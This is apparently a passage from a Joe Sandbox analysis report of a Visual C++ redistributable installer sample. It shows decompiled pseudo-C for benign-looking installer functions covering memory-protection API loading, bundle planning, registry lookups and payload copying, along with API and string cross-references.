                                                                          • String ID: %u\$@Met$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                                          • API String ID: 1726527325-8456610
                                                                          • Opcode ID: 4ce0ce029314d27fbaef3c26480270351ceb99b86b012d45ce480a0ce2d85372
                                                                          • Instruction ID: 2ae783d3a644e7636d2bc4dcf6f3a73f3c61002c1f57a6ef031614a07cbe2a2e
                                                                          • Opcode Fuzzy Hash: 4ce0ce029314d27fbaef3c26480270351ceb99b86b012d45ce480a0ce2d85372
                                                                          • Instruction Fuzzy Hash: 8541A472D8123DABDB219A649C49FDAB7B8EB14710F100195EA08A7141D7749F808BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 81%
                                                                          			E0004FBAD() {
                                                                          				_Unknown_base(*)()* _t2;
                                                                          				_Unknown_base(*)()* _t5;
                                                                          				_Unknown_base(*)()* _t6;
                                                                          				void* _t8;
                                                                          				void* _t13;
                                                                          
                                                                          				_t13 = E000137D6(L"AdvApi32.dll", 0x7b5e8);
                                                                          				if(_t13 < 0) {
                                                                          					_t2 =  *0x7b5f4; // 0x0
                                                                          				} else {
                                                                          					 *0x7b5f0 = GetProcAddress( *0x7b5e8, "SystemFunction040");
                                                                          					_t2 = GetProcAddress( *0x7b5e8, "SystemFunction041");
                                                                          					 *0x7b5f4 = _t2;
                                                                          				}
                                                                          				if( *0x7b5f0 == 0 || _t2 == 0) {
                                                                          					_t13 = E000137D6(L"Crypt32.dll", 0x7b5ec);
                                                                          					if(_t13 >= 0) {
                                                                          						_t5 = GetProcAddress( *0x7b5ec, "CryptProtectMemory");
                                                                          						 *0x7b5f8 = _t5;
                                                                          						if( *0x7b5f0 != 0 || _t5 != 0) {
                                                                          							_t6 = GetProcAddress( *0x7b5ec, "CryptUnprotectMemory");
                                                                          							 *0x7b5fc = _t6;
                                                                          							if( *0x7b5f4 != 0 || _t6 != 0) {
                                                                          								goto L13;
                                                                          							} else {
                                                                          								_t16 =  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
                                                                          								_t8 = 0x80004005;
                                                                          								_t13 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
                                                                          								_push(_t13);
                                                                          								_push(0x2d);
                                                                          								goto L9;
                                                                          							}
                                                                          						} else {
                                                                          							_t19 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          							_t8 = 0x80004005;
                                                                          							_t13 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t13);
                                                                          							_push(0x28);
                                                                          							L9:
                                                                          							_push("cryputil.cpp");
                                                                          							E000137D3(_t8);
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					L13:
                                                                          					 *0x7b600 = 1;
                                                                          				}
                                                                          				return _t13;
                                                                          			}









                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(SystemFunction040,AdvApi32.dll), ref: 0004FBD5
                                                                          • GetProcAddress.KERNEL32(SystemFunction041), ref: 0004FBE7
                                                                          • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0004FC2A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0004FC3E
                                                                          • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0004FC76
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0004FC8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLast
                                                                          • String ID: @Met$AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                          • API String ID: 4214558900-313144314
                                                                          • Opcode ID: a13ed5c78d970f243a7dd0f78e5c3e790b8f74fa8cca3f11a7b59948953aad76
                                                                          • Instruction ID: bef039776b4f119420b015a89b2fced616c9e6bed3e1786e09bfe9236089dffd
                                                                          • Opcode Fuzzy Hash: a13ed5c78d970f243a7dd0f78e5c3e790b8f74fa8cca3f11a7b59948953aad76
                                                                          • Instruction Fuzzy Hash: 1F21C2B1E40F279EF7216B66AE48B7279D0AB00750F024131ED09FA1A1E77DDC808A98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E00022DDC(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                          				intOrPtr* _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				intOrPtr _v24;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _t92;
                                                                          				intOrPtr* _t93;
                                                                          				intOrPtr _t98;
                                                                          				intOrPtr* _t104;
                                                                          				intOrPtr _t113;
                                                                          				intOrPtr _t118;
                                                                          				intOrPtr* _t119;
                                                                          				intOrPtr _t120;
                                                                          				intOrPtr _t132;
                                                                          				intOrPtr _t142;
                                                                          				intOrPtr* _t146;
                                                                          				intOrPtr _t147;
                                                                          				intOrPtr* _t148;
                                                                          				intOrPtr _t150;
                                                                          				intOrPtr _t151;
                                                                          				intOrPtr* _t157;
                                                                          				void* _t158;
                                                                          				intOrPtr* _t160;
                                                                          				intOrPtr* _t161;
                                                                          				intOrPtr* _t162;
                                                                          				intOrPtr _t164;
                                                                          				void* _t166;
                                                                          
                                                                          				_t158 = __edi;
                                                                          				_t143 = __ecx;
                                                                          				_t142 = _a8;
                                                                          				_t156 = 0;
                                                                          				_t162 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_t4 = _t142 + 0xc0; // 0x2e002d
                                                                          				_t88 =  *_t4;
                                                                          				_v20 = 0;
                                                                          				_v12 = 0;
                                                                          				if( *_t4 == 0) {
                                                                          					L7:
                                                                          					_v32 = _t156;
                                                                          					__eflags =  *((intOrPtr*)(_t142 + 0xb8)) - _t156;
                                                                          					if( *((intOrPtr*)(_t142 + 0xb8)) <= _t156) {
                                                                          						L69:
                                                                          						if(_v12 != 0) {
                                                                          							E00055450(_t158, _v12);
                                                                          						}
                                                                          						if(_v16 != 0) {
                                                                          							E00012647(_v16, _v20);
                                                                          						}
                                                                          						return _t162;
                                                                          					}
                                                                          					_t92 = _t156;
                                                                          					_v36 = _t92;
                                                                          					_push(_t158);
                                                                          					do {
                                                                          						_t16 = _t142 + 0xb4; // 0x280027
                                                                          						_t160 =  *_t16 + _t92;
                                                                          						 *((intOrPtr*)(_t160 + 0x64)) = _t156;
                                                                          						 *((intOrPtr*)(_t160 + 0x68)) = _t156;
                                                                          						__eflags = _v12;
                                                                          						if(_v12 == 0) {
                                                                          							__eflags = _a20 - 3;
                                                                          							if(_a20 != 3) {
                                                                          								L15:
                                                                          								_t24 = _t142 + 0xc0; // 0x2e002d
                                                                          								_t93 =  *_t24;
                                                                          								__eflags = _t93;
                                                                          								if(_t93 == 0) {
                                                                          									L25:
                                                                          									_t43 = _t142 + 0x10; // 0x6c0064
                                                                          									_t44 = _t160 + 0xbc; // 0x2800e3
                                                                          									_t162 = E000121A5(_t44,  *_t43, _t156);
                                                                          									__eflags = _t162;
                                                                          									if(_t162 < 0) {
                                                                          										_push("Failed to copy self to related bundle ancestors.");
                                                                          										L67:
                                                                          										_push(_t162);
                                                                          										E0005012F();
                                                                          										L68:
                                                                          										_pop(_t158);
                                                                          										goto L69;
                                                                          									}
                                                                          									L26:
                                                                          									_t98 =  *_t160 - 1;
                                                                          									__eflags = _t98;
                                                                          									if(_t98 == 0) {
                                                                          										L49:
                                                                          										_t59 = _t160 + 0x68; // 0x28008f
                                                                          										_t157 = _t59;
                                                                          										L50:
                                                                          										 *((intOrPtr*)(_t160 + 0x64)) =  *_t157;
                                                                          										_t146 =  *((intOrPtr*)(_a4 + 0x10));
                                                                          										_t162 = E0001D58B(_a4, 1,  *((intOrPtr*)( *_t146 + 0x50))(_t146,  *((intOrPtr*)(_t160 + 0x18)), _t157));
                                                                          										_v8 = _t162;
                                                                          										__eflags = _t162;
                                                                          										if(_t162 < 0) {
                                                                          											E000137D3(_t102, "plan.cpp", 0x500, _t162);
                                                                          											_push("UX aborted plan related bundle.");
                                                                          											goto L67;
                                                                          										}
                                                                          										_t147 =  *((intOrPtr*)(_t160 + 0x64));
                                                                          										_t67 = _t160 + 0x68; // 0x28008f
                                                                          										_t104 = _t67;
                                                                          										__eflags =  *_t104 - _t147;
                                                                          										if( *_t104 != _t147) {
                                                                          											_push(E000241CD(_t147));
                                                                          											_push(E000241CD( *((intOrPtr*)(_t160 + 0x68))));
                                                                          											E0001550F(2, 0x200000ca,  *((intOrPtr*)(_t160 + 0x18)));
                                                                          											_t166 = _t166 + 0x14;
                                                                          											_t70 = _t160 + 0x68; // 0x28008f
                                                                          											_t104 = _t70;
                                                                          										}
                                                                          										_t148 = _a16;
                                                                          										_t156 = 0;
                                                                          										__eflags =  *_t148 - 3;
                                                                          										if( *_t148 == 3) {
                                                                          											__eflags =  *_t160 - 5;
                                                                          											if( *_t160 != 5) {
                                                                          												goto L59;
                                                                          											}
                                                                          											__eflags =  *_t104;
                                                                          											if( *_t104 == 0) {
                                                                          												goto L59;
                                                                          											}
                                                                          											__eflags =  *((intOrPtr*)(_t160 + 0xa0));
                                                                          											if( *((intOrPtr*)(_t160 + 0xa0)) <= 0) {
                                                                          												goto L59;
                                                                          											}
                                                                          											_t161 =  *((intOrPtr*)(_t160 + 0x9c));
                                                                          											_t74 = _t148 + 0x78; // 0x5b508
                                                                          											_t76 = _t148 + 0x74; // 0x5b504
                                                                          											_t162 = E00058F31(_t76, _t74,  *_t161,  *((intOrPtr*)(_t161 + 8)));
                                                                          											_v8 = _t162;
                                                                          											__eflags = _t162;
                                                                          											if(_t162 < 0) {
                                                                          												_push( *_t161);
                                                                          												_push("Failed to add the package provider key \"%ls\" to the planned list.");
                                                                          												L64:
                                                                          												_push(_t162);
                                                                          												E0005012F();
                                                                          												goto L68;
                                                                          											}
                                                                          											L58:
                                                                          											_t156 = 0;
                                                                          											__eflags = 0;
                                                                          										}
                                                                          										goto L59;
                                                                          									}
                                                                          									_t113 = _t98 - 1;
                                                                          									__eflags = _t113;
                                                                          									if(_t113 == 0) {
                                                                          										__eflags = _a12 - 2;
                                                                          										if(_a12 == 2) {
                                                                          											goto L49;
                                                                          										}
                                                                          										__eflags =  *_a16 - 3;
                                                                          										if( *_a16 <= 3) {
                                                                          											goto L49;
                                                                          										}
                                                                          										_t54 = _t142 + 0x3c; // 0x6e0072
                                                                          										__eflags =  *_t54 -  *((intOrPtr*)(_t160 + 0xc));
                                                                          										if(__eflags < 0) {
                                                                          											L47:
                                                                          											__eflags = 0;
                                                                          											L48:
                                                                          											_t58 = _t160 + 0x68; // 0x28008f
                                                                          											_t157 = _t58;
                                                                          											 *_t157 = 0;
                                                                          											goto L50;
                                                                          										}
                                                                          										if(__eflags > 0) {
                                                                          											L46:
                                                                          											_push(2);
                                                                          											_pop(0);
                                                                          											goto L48;
                                                                          										}
                                                                          										_t56 = _t142 + 0x38; // 0x65006b
                                                                          										__eflags =  *_t56 -  *((intOrPtr*)(_t160 + 8));
                                                                          										if( *_t56 <=  *((intOrPtr*)(_t160 + 8))) {
                                                                          											goto L47;
                                                                          										}
                                                                          										goto L46;
                                                                          									}
                                                                          									_t118 = _t113 - 1;
                                                                          									__eflags = _t118;
                                                                          									if(_t118 == 0) {
                                                                          										L34:
                                                                          										_t119 = _a16;
                                                                          										__eflags =  *_t119 - 3;
                                                                          										if( *_t119 != 3) {
                                                                          											_t150 = 5;
                                                                          											__eflags =  *_t119 - _t150;
                                                                          											if( *_t119 == _t150) {
                                                                          												L40:
                                                                          												_t51 = _t160 + 0x68; // 0x28008f
                                                                          												_t157 = _t51;
                                                                          												 *_t157 = 4;
                                                                          												goto L50;
                                                                          											}
                                                                          											__eflags =  *_t119 - 6;
                                                                          											if( *_t119 == 6) {
                                                                          												goto L40;
                                                                          											}
                                                                          											__eflags =  *_t119 - 7;
                                                                          											_t50 = _t160 + 0x68; // 0x28008f
                                                                          											_t157 = _t50;
                                                                          											if( *_t119 == 7) {
                                                                          												 *_t157 = _t150;
                                                                          											}
                                                                          											goto L50;
                                                                          										}
                                                                          										_t49 = _t160 + 0x68; // 0x28008f
                                                                          										_t157 = _t49;
                                                                          										 *_t157 = 2;
                                                                          										goto L50;
                                                                          									}
                                                                          									_t120 = _t118 - 1;
                                                                          									__eflags = _t120;
                                                                          									if(_t120 == 0) {
                                                                          										goto L34;
                                                                          									}
                                                                          									__eflags = _t120 != 1;
                                                                          									if(_t120 != 1) {
                                                                          										_push( *_t160);
                                                                          										_t162 = 0x8000ffff;
                                                                          										_push("Unexpected relation type encountered during plan: %d");
                                                                          										goto L64;
                                                                          									}
                                                                          									__eflags = _a12 - 2;
                                                                          									_t46 = _t160 + 0x68; // 0x28008f
                                                                          									_t157 = _t46;
                                                                          									if(_a12 != 2) {
                                                                          										__eflags =  *_a16 - 3;
                                                                          										if( *_a16 == 3) {
                                                                          											 *_t157 = 5;
                                                                          										}
                                                                          									}
                                                                          									goto L50;
                                                                          								}
                                                                          								__eflags =  *_t93 - _t156;
                                                                          								if( *_t93 == _t156) {
                                                                          									goto L25;
                                                                          								}
                                                                          								_t25 = _t142 + 0x10; // 0x6c0064
                                                                          								_push( *_t25);
                                                                          								_t26 = _t160 + 0xbc; // 0x2800e3
                                                                          								_t162 = E00011F20(_t26, L"%ls;%ls", _t93);
                                                                          								_t166 = _t166 + 0x10;
                                                                          								__eflags = _t162;
                                                                          								if(_t162 >= 0) {
                                                                          									goto L26;
                                                                          								}
                                                                          								_push("Failed to copy ancestors and self to related bundle ancestors.");
                                                                          								goto L67;
                                                                          							}
                                                                          							_v24 = _t156;
                                                                          							__eflags =  *((intOrPtr*)(_t160 + 0xa0)) - _t156;
                                                                          							if( *((intOrPtr*)(_t160 + 0xa0)) <= _t156) {
                                                                          								L24:
                                                                          								_push(E0002416A( *_t160));
                                                                          								_push( *((intOrPtr*)(_t160 + 0x18)));
                                                                          								_push(0x200000d5);
                                                                          								L12:
                                                                          								_push(2);
                                                                          								E0001550F();
                                                                          								_t166 = _t166 + 0x10;
                                                                          								goto L58;
                                                                          							}
                                                                          							_t151 = _t156;
                                                                          							_t164 = 1;
                                                                          							_v28 = _t151;
                                                                          							do {
                                                                          								_t32 = _t142 + 0x44; // 0x320033
                                                                          								__eflags = CompareStringW(0x7f, 1,  *( *((intOrPtr*)(_t160 + 0x9c)) + _t151), 0xffffffff,  *_t32, 0xffffffff) - 2;
                                                                          								_t164 =  ==  ? 0 : _t164;
                                                                          								_t132 = _v24 + 1;
                                                                          								_t151 = _v28 + 0x10;
                                                                          								_v24 = _t132;
                                                                          								_v28 = _t151;
                                                                          								__eflags = _t132 -  *((intOrPtr*)(_t160 + 0xa0));
                                                                          							} while (_t132 <  *((intOrPtr*)(_t160 + 0xa0)));
                                                                          							_a8 = _t164;
                                                                          							_t162 = _v8;
                                                                          							__eflags = _a8;
                                                                          							if(_a8 == 0) {
                                                                          								L14:
                                                                          								_t156 = 0;
                                                                          								__eflags = 0;
                                                                          								goto L15;
                                                                          							}
                                                                          							goto L24;
                                                                          						}
                                                                          						_t162 = E000554A3(_t143, _v12,  *((intOrPtr*)(_t160 + 0x18)));
                                                                          						_v8 = _t162;
                                                                          						__eflags = _t162;
                                                                          						if(_t162 < 0) {
                                                                          							__eflags = _t162 - 0x80070490;
                                                                          							if(_t162 != 0x80070490) {
                                                                          								_push("Failed to lookup the bundle ID in the ancestors dictionary.");
                                                                          								goto L67;
                                                                          							}
                                                                          							goto L14;
                                                                          						}
                                                                          						_push(E0002416A( *_t160));
                                                                          						_push( *((intOrPtr*)(_t160 + 0x18)));
                                                                          						_push(0x200000d6);
                                                                          						goto L12;
                                                                          						L59:
                                                                          						_t143 = _v32 + 1;
                                                                          						_t92 = _v36 + 0xf8;
                                                                          						_v32 = _t143;
                                                                          						_v36 = _t92;
                                                                          						_t82 = _t142 + 0xb8; // 0x2a0029
                                                                          						__eflags = _t143 -  *_t82;
                                                                          					} while (_t143 <  *_t82);
                                                                          					goto L68;
                                                                          				}
                                                                          				if(E0001280D(__ecx, 0,  &_v16,  &_v20, _t88, ";") >= 0) {
                                                                          					_t162 = E000553DB(__ecx,  &_v12, _v16, _v20, 1);
                                                                          					_v8 = _t162;
                                                                          					__eflags = _t162;
                                                                          					if(_t162 >= 0) {
                                                                          						_t156 = 0;
                                                                          						__eflags = 0;
                                                                          						goto L7;
                                                                          					} else {
                                                                          						_push("Failed to create dictionary from ancestors array.");
                                                                          						goto L3;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to create string array from ancestors.");
                                                                          					L3:
                                                                          					_push(_t162);
                                                                          					E0005012F();
                                                                          					goto L69;
                                                                          				}
                                                                          			}

































                                                                          0x00022f60
                                                                          0x00022e87
                                                                          0x00022e89
                                                                          0x00022e8c
                                                                          0x00022e8e
                                                                          0x00022eaf
                                                                          0x00022eb5
                                                                          0x000230f0
                                                                          0x00000000
                                                                          0x000230f0
                                                                          0x00000000
                                                                          0x00022eb5
                                                                          0x00022e97
                                                                          0x00022e98
                                                                          0x00022e9b
                                                                          0x00000000
                                                                          0x000230d0
                                                                          0x000230d6
                                                                          0x000230d7
                                                                          0x000230dc
                                                                          0x000230df
                                                                          0x000230e2
                                                                          0x000230e2
                                                                          0x000230e2
                                                                          0x00000000
                                                                          0x000230ee
                                                                          0x00022e18
                                                                          0x00022e3d
                                                                          0x00022e3f
                                                                          0x00022e42
                                                                          0x00022e44
                                                                          0x00022e4d
                                                                          0x00022e4d
                                                                          0x00000000
                                                                          0x00022e46
                                                                          0x00022e46
                                                                          0x00000000
                                                                          0x00022e46
                                                                          0x00022e1a
                                                                          0x00022e1a
                                                                          0x00022e1f
                                                                          0x00022e1f
                                                                          0x00022e20
                                                                          0x00000000
                                                                          0x00022e26

                                                                          Strings
                                                                          • UX aborted plan related bundle., xrefs: 00023127
                                                                          • %ls;%ls, xrefs: 00022EDE
                                                                          • crypt32.dll, xrefs: 00022E0E
                                                                          • Failed to lookup the bundle ID in the ancestors dictionary., xrefs: 000230F0
                                                                          • Failed to copy self to related bundle ancestors., xrefs: 0002312E
                                                                          • Failed to copy ancestors and self to related bundle ancestors., xrefs: 00022EF6
                                                                          • Unexpected relation type encountered during plan: %d, xrefs: 000230FE
                                                                          • plan.cpp, xrefs: 0002311D
                                                                          • Failed to create dictionary from ancestors array., xrefs: 00022E46
                                                                          • Failed to create string array from ancestors., xrefs: 00022E1A
                                                                          • Failed to add the package provider key "%ls" to the planned list., xrefs: 00023107
                                                                          • feclient.dll, xrefs: 000230BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %ls;%ls$Failed to add the package provider key "%ls" to the planned list.$Failed to copy ancestors and self to related bundle ancestors.$Failed to copy self to related bundle ancestors.$Failed to create dictionary from ancestors array.$Failed to create string array from ancestors.$Failed to lookup the bundle ID in the ancestors dictionary.$UX aborted plan related bundle.$Unexpected relation type encountered during plan: %d$crypt32.dll$feclient.dll$plan.cpp
                                                                          • API String ID: 0-794096528
                                                                          • Opcode ID: 49f5caa18576346ae139d9fbe4dba01aa5e8850df1d72bd43fb1c16e9b415687
                                                                          • Instruction ID: 132455a1a02a9faf5848f03f880640739f71164341e89b92ddb3233a98b523db
                                                                          • Opcode Fuzzy Hash: 49f5caa18576346ae139d9fbe4dba01aa5e8850df1d72bd43fb1c16e9b415687
                                                                          • Instruction Fuzzy Hash: EBB1D231900626FFCB65DFA4DC81EAEB7F6FF04310F104566E904AB251D735AAA0CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 50%
                                                                          			E0001A17D(intOrPtr _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				int _v12;
                                                                          				int _v16;
                                                                          				int _v20;
                                                                          				signed short _t51;
                                                                          				intOrPtr _t55;
                                                                          				signed short _t60;
                                                                          				void* _t64;
                                                                          				void* _t66;
                                                                          				void* _t70;
                                                                          
                                                                          				_t55 = _a4;
                                                                          				_a4 =  *((intOrPtr*)(_t55 + 0x24));
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				if(E000171CF(_a8,  *((intOrPtr*)(_t55 + 0x1c)),  &_v8, 0) >= 0) {
                                                                          					_t64 = 1;
                                                                          					_t37 =  ==  ? 1 : 0x101;
                                                                          					_t66 = E00050E3F( *((intOrPtr*)(_t55 + 0x18)), _v8,  ==  ? 1 : 0x101,  &_v16);
                                                                          					if(_t66 < 0) {
                                                                          						_push(_v8);
                                                                          						if(_t66 != 0x80070002) {
                                                                          							_push("Failed to open registry key. Key = \'%ls\'");
                                                                          							_push(_t66);
                                                                          							E0005012F();
                                                                          							_t70 = _t70 + 0xc;
                                                                          							L18:
                                                                          							if(_t66 < 0) {
                                                                          								_push(_t66);
                                                                          								E0005061A(2, "RegistrySearchExists failed: ID \'%ls\', HRESULT 0x%x", _v8);
                                                                          							}
                                                                          							L20:
                                                                          							E00012793(_v8);
                                                                          							E00012793(_v12);
                                                                          							if(_v16 != 0) {
                                                                          								RegCloseKey(_v16);
                                                                          							}
                                                                          							return _t66;
                                                                          						}
                                                                          						_push("Registry key not found. Key = \'%ls\'");
                                                                          						_push(2);
                                                                          						E0005061A();
                                                                          						_t70 = _t70 + 0xc;
                                                                          						L14:
                                                                          						_t64 = 0;
                                                                          						L15:
                                                                          						_t66 = E00018152(_a8,  *((intOrPtr*)(_t55 + 4)), _t64, 0, 0);
                                                                          						if(_t66 >= 0) {
                                                                          							goto L20;
                                                                          						}
                                                                          						_push("Failed to set variable.");
                                                                          						L2:
                                                                          						_push(_t66);
                                                                          						E0005012F();
                                                                          						goto L18;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t55 + 0x20)) == 0) {
                                                                          						goto L15;
                                                                          					}
                                                                          					_t66 = E000171CF(_a8,  *((intOrPtr*)(_t55 + 0x20)),  &_v12, 0);
                                                                          					if(_t66 >= 0) {
                                                                          						_t51 = RegQueryValueExW(_v16, _v12, 0,  &_v20, 0, 0);
                                                                          						_t60 = _t51;
                                                                          						if(_t60 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						if(_t60 == 0) {
                                                                          							_push(_v12);
                                                                          							E0005061A(2, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v8);
                                                                          							_t70 = _t70 + 0x10;
                                                                          							goto L14;
                                                                          						}
                                                                          						if(_t51 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_t69 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          						_t66 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "search.cpp", 0x322, _t66);
                                                                          						_push("Failed to query registry key value.");
                                                                          						goto L2;
                                                                          					}
                                                                          					_push("Failed to format value string.");
                                                                          					goto L2;
                                                                          				}
                                                                          				_push("Failed to format key string.");
                                                                          				goto L2;
                                                                          			}














                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A1A8
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A204
                                                                          • RegQueryValueExW.ADVAPI32(000002C0,00000000,00000000,000002C0,00000000,00000000,000002C0,?,00000000,00000000,?,00000000,00000101,000002C0,000002C0,?), ref: 0001A226
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,000002C0,00000100,00000000,000002C0), ref: 0001A300
                                                                          Strings
                                                                          • Failed to format value string., xrefs: 0001A20F
                                                                          • Failed to set variable., xrefs: 0001A2B8
                                                                          • Failed to open registry key. Key = '%ls', xrefs: 0001A2C2
                                                                          • Failed to query registry key value., xrefs: 0001A265
                                                                          • Registry key not found. Key = '%ls', xrefs: 0001A291
                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0001A275
                                                                          • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0001A2D8
                                                                          • Failed to format key string., xrefs: 0001A1B3
                                                                          • search.cpp, xrefs: 0001A25B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16$CloseQueryValue
                                                                          • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                          • API String ID: 2702208347-46557908
                                                                          • Opcode ID: b822c93b8990da08483b6b02497eef0d7d5981e6bd4c53beb6073587ba18269a
                                                                          • Instruction ID: 50330439d1e05f209d15fc46f316413af290b5c4a578e7fbb96ad5b0642a1dea
                                                                          • Opcode Fuzzy Hash: b822c93b8990da08483b6b02497eef0d7d5981e6bd4c53beb6073587ba18269a
                                                                          • Instruction Fuzzy Hash: 1241E832E41214BBDF256F98CC06FEF7B69EF05711F104165FD08AA292D7728E90D692
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 16%
                                                                          			E000295AC(void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                                          				intOrPtr _t15;
                                                                          				intOrPtr _t26;
                                                                          				signed short _t27;
                                                                          				intOrPtr _t32;
                                                                          				void* _t34;
                                                                          				void* _t36;
                                                                          				WCHAR* _t37;
                                                                          				intOrPtr _t39;
                                                                          				intOrPtr _t40;
                                                                          
                                                                          				_t36 = __edx;
                                                                          				_t37 = _a12;
                                                                          				_t34 = CreateFileW(_t37, 0x80000000, 5, 0, 3, 0x8000000, 0);
                                                                          				_a12 = _t34;
                                                                          				if(_t34 != 0xffffffff) {
                                                                          					_t15 = _a4;
                                                                          					__eflags =  *((intOrPtr*)(_t15 + 0x20));
                                                                          					if( *((intOrPtr*)(_t15 + 0x20)) == 0) {
                                                                          						__eflags =  *((intOrPtr*)(_t15 + 0x1c));
                                                                          						if( *((intOrPtr*)(_t15 + 0x1c)) == 0) {
                                                                          							__eflags =  *((intOrPtr*)(_t15 + 0x30));
                                                                          							if(__eflags == 0) {
                                                                          								goto L12;
                                                                          							} else {
                                                                          								_t40 = E00028F8E(_t36, __eflags,  *((intOrPtr*)(_t15 + 0x30)),  *((intOrPtr*)(_t15 + 0x34)), _t37, _t34);
                                                                          								__eflags = _t40;
                                                                          								if(_t40 >= 0) {
                                                                          									goto L12;
                                                                          								} else {
                                                                          									_push(_a8);
                                                                          									_push("Failed to verify payload hash: %ls");
                                                                          									goto L6;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t26 = E000291F7(_t36, _t15, _t37, _t34);
                                                                          							goto L4;
                                                                          						}
                                                                          					} else {
                                                                          						_t26 = E0002A998(_t36, _t15, _t37, _t34);
                                                                          						L4:
                                                                          						_t40 = _t26;
                                                                          						__eflags = _t40;
                                                                          						if(_t40 >= 0) {
                                                                          							L12:
                                                                          							_t39 = _a16;
                                                                          							_t32 = _a8;
                                                                          							__eflags = _t39;
                                                                          							_push(_t32);
                                                                          							_push(_t37);
                                                                          							_t17 =  ==  ? L"Copying" : L"Moving";
                                                                          							E0005061A(2, "%ls payload from working path \'%ls\' to path \'%ls\'",  ==  ? L"Copying" : L"Moving");
                                                                          							_push(0x7d0);
                                                                          							_push(3);
                                                                          							_push(1);
                                                                          							__eflags = _t39;
                                                                          							if(_t39 == 0) {
